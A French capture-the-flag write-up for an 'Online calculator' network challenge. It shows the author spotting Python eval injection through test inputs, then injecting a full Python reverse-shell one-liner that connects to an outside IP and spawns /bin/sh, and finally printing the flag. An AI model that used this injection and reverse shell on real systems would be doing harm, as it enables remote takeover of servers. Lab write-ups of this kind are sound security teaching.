# Online calculator

- [Online calculator](#online-calculator)
  - [Présentation chall](#présentation-chall)
  - [Write-up](#write-up)

## Présentation chall

➜ **Name** : Online calculator

➜ **Catégorie** : ⚡ system

➜ **Contexte** :

On vient de développer une petite calculatrice disponible sur un port réseau. On prévoit de l'héberger sur une grosse machine au sein de l'université, pour permettre à tout le monde d'effectuer des gros calculs rapidement. C'est une demande croissante parmi nos chercheurs !

➜ **Connexion TCP sur :** `ctf.efrei.wtf:23339`

## Write-up

- tentons de nous co avec nc

```noth
❯ nc ctf.efrei.wtf 23339
Input an arithmetic expression : 3**3**3
Result : 7625597484987
Input an arithmetic expression : 3+3 
Result : 6
Input an arithmetic expression :
une simple calculatrice ?
```

- on dirait bien une calculatrice fonctionnelle

🐈 **Réflexe :** on a un user input qui est évalué (arithmétiquement) par le serveur. Il y a peut-être une injection possible. Démarche :

- on tente des trucs randoms
- on prouve l'injection
- on pop un reverse shell

```bash
Input an arithmetic expression : ls
Sorry i did not understand. # on dirait que c'est pas du bash

Input an arithmetic expression : print("yo")
Result : None # ok ça sent bon, python ?
Input an arithmetic expression : a=4
Sorry i did not understand.
Input an arithmetic expression : exec('a=4')
Result : None # Python pour sûr, et injection fonctionnelle
```

On pop un listener sur un serveur contrôlé en ligne :

```
[it4@peace calc]$ nc -lvp 9999
```

Et on injecte notre reverse shell dans la calculatrice :

```bash
Input an arithmetic expression : platform.os.system("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"163.172.218.19\",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'")
```

Côté reverse shell :

```sh
[it4@peace calc]$ nc -lvp 9999
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 192.168.48.2.
Ncat: Connection from 192.168.48.2:53110.
/bin/sh: 0: can't access tty; job control turned off
# find / -name flag
/just/run/find/to/find/the/flag

# cat  /just/run/find/to/find/the/flag
EFREI{n1ce_inj3cti0n}
```

💡 **Flag !**
